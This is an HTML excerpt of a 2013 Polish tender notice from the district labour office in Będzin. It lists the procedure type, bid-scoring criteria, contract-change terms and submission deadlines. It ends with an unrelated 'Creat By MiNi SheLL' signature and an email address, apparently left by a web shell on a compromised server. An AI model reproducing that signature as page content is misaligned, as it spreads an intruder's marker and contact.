<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Posiadanie przez Wykonawcę akredytacji kuratora oświaty w zakresie przedmiotowego szkolenia - 20</li>
<li>3 - Posiadanie przez Wykonawcę certyfikatu systemu zarządzania jakością kształcenia/szkolenia, wydanego na podstawie międzynarodowych norm ISO - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany istotnych postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami podanymi we wzorze umowy, stanowiącym załącznik nr 8 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.bedzin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Będzinie, 42-500 Będzin, ul. Ignacego Krasickiego 17A pok. 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2013 godzina 08:00, miejsce: Powiatowy Urząd Pracy w Będzinie, 42-500 Będzin, ul. Ignacego Krasickiego 17A sekretariat - pok. 113.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com